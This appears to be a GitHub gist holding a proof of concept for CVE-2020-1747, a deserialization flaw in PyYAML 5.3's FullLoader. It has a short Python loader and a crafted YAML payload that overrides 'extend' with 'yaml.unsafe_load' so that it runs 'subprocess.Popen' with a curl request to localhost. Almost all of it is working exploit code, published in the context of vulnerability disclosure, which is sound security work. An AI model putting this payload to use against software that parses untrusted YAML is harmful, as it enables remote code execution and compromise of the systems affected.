CVE-2020-1747 PyYAML PoC
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1 | |
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386 | |
# Explanation: https://2130706433.net/blog/pyyaml/ | |
from yaml import * | |
with open('payload.yaml','rb') as f: | |
content = f.read() | |
data = load(content, Loader=FullLoader) # Using vulnerable FullLoader |
# The `extend` function is overriden to run `yaml.unsafe_load` with | |
# custom `listitems` argument, in this case a simple curl request | |
- !!python/object/new:yaml.MappingNode | |
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]' | |
state: | |
tag: !!str dummy | |
value: !!str dummy | |
extend: !!python/name:yaml.unsafe_load |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment